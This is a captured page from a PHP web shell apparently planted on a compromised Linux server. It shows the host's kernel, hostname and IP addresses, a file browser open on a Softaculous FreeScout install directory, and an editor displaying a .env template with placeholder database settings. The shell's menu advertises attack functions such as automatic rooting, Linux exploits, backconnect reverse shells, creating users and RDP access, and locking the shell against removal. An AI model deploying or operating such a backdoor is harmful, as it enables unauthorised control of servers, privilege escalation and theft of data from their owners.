Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
freescout /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.env
922
B
-rw-r--r--
.installed
59
B
-rw-r--r--
clone.php
11.06
KB
-rw-r--r--
config.php
35
KB
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
10.03
KB
-rw-r--r--
fileindex.php
336
B
-rw-r--r--
import.php
3.14
KB
-rw-r--r--
info.xml
2.7
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.1
KB
-rw-r--r--
install.xml
1.95
KB
-rw-r--r--
md5
4.79
KB
-rw-r--r--
notes.txt
709
B
-rw-r--r--
update_pass.php
518
B
-rw-r--r--
upgrade.php
6.39
KB
-rw-r--r--
upgrade.xml
282
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
# Every time you are making changes in .env file, in order changes to take an effect you need to run: # php artisan freescout:clear-cache # Application URL APP_URL=[[softurl]] # Improve security SESSION_SECURE_COOKIE=[[SESSION_SECURE_COOKIE]] # Timezones: https://github.com/freescout-helpdesk/freescout/wiki/PHP-Timezones # Comment it to use default timezone from php.ini APP_TIMEZONE=America/New_York # Default language APP_LOCALE=[[language]] # Database settings DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" # Run the following console command to generate the key: php artisan key:generate # Otherwise application will show the following error: "Whoops, looks like something went wrong" APP_KEY=[[APP_KEY]] # Uncomment to see errors in your browser, don't forget to comment it back when debugging finished #APP_DEBUG=true
Close